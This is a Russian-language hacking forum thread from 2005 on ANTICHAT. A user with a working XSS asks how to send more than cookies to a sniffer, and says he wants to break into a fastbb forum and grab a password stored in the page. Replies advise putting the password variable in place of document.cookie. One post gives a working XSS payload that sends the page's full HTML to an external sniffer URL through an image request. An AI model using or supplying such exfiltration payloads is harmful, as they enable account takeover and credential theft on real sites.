HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Что можно передать кроме кук на сниффер?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Что можно передать кроме кук на сниффер?
  #1  
Старый 09.11.2005, 14:45
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию Что можно передать кроме кук на сниффер?
Есть рабочая xss. Такой вопрос: можно ли передать на сниффер фрагмент самой страницы, её html-кода?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 09.11.2005, 15:23
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
или я тебя не понял или ты сам не знаешь чего написал=))))
передаются Referer, Query [куки], Agent и все..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #3  
Старый 11.11.2005, 15:25
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
С нами: 11081186

Репутация: 9
По умолчанию
Цитата:
Сообщение от m0nzt3r  
или я тебя не понял или ты сам не знаешь чего написал=))))
передаются Referer, Query [куки], Agent и все..
Мне кажется это ты не хнаешь что написал!!! )

Почему ты написал Query [куки]?!!!
 
Ответить с цитированием

  #4  
Старый 19.11.2005, 15:55
dinar_007
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
С нами: 11215046

Репутация: 1844


По умолчанию
Цитата:
Сообщение от bul666  
Мне кажется это ты не хнаешь что написал!!! )

Почему ты написал Query [куки]?!!!
Просто в строке Query выводятся куки )))
 
Ответить с цитированием

  #5  
Старый 09.11.2005, 16:05
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию
Лан, я просто плохо объяснил....извините...короч проблема вот в чём...
нужно взломать fastbb, позарез. Такая параша, но очень необходимо.
Короче куки на сниффер приходят, но они ужасной кодировки...не подставляются, то ли привязка там к чему-то стоит. Не знаю, если не получится то что я придумал, тогда буду пробовать дальше. А придумал я то что там пароль на странице хранится в открытом виде(в html виде => var pass). И я подумал нельзя ли пересылать его снифферу? Вот решил спросить у вас...
 
Ответить с цитированием

  #6  
Старый 09.11.2005, 16:14
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
Цитата:
передаются Referer, Query [куки], Agent и все..
А ты уверен??
Просто сниффер не логирует\показывает.
Например порт браузера,порт сервера ну и кучу другой не нужной информации,хотя кому-то может и нужной...
 
Ответить с цитированием

  #7  
Старый 09.11.2005, 16:17
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
Цитата:
И я подумал нельзя ли пересылать его снифферу?
Я в ждавескрипте ничерта не смыслю
Вместо document.cookie поставь название переменной...
зы не забываем про репутацию
 
Ответить с цитированием

  #8  
Старый 09.11.2005, 16:30
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
qBiN, в данный момент речь идет об ачатовском снифферее,а соответственно он показывает только то что я перечислил... да и не будет же он показывать ХТМЛ код, это же глупо не так ли??
BaH, это уже другой разговор...помоему надо пхп скрипт подделать который будет принимать значения формы var_pass а в пхп я 0 =)
Чесно говоря уже задолбали Повышайте мне репутацию! после этой новой системы...
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
Последний раз редактировалось m0nzt3r; 11.11.2005 в 00:59..
 
Ответить с цитированием

  #9  
Старый 11.11.2005, 00:50
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию
Цитата:
Сообщение от m0nzt3r  
qBiN, в данный момент речь идет об ачатовском снифферее,а соответственно он показывает только то что я перечислил... да и не будет же он показывать ХТМЛ код, это же глупо не так ли??
BaH, это уже другой разговор...помоему надо пхп скрипт подделать который будет принимать значения формы var_pass а в пхп я 0 =)
Сниффер может показывать все что угодно. Вернее все что вы на него передадите.
Например вот так можно переслать на сниффер всю HTML страницу:
Цитата:
<script>i=new Image(); i.src="http://antichat.ru/cgi-bin/s.jpg?"+document.documentElement.innerHTML;</script>
 
Ответить с цитированием

  #10  
Старый 19.11.2005, 15:57
dinar_007
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
С нами: 11215046

Репутация: 1844


По умолчанию
Цитата:
Сообщение от Algol  
Сниффер может показывать все что угодно. Вернее все что вы на него передадите.
Например вот так можно переслать на сниффер всю HTML страницу:
Но форум же не ХТМЛ, а ПХП ))) Или это значения не имеет???
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
химия своими руками silveran Болталка 43 11.01.2006 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.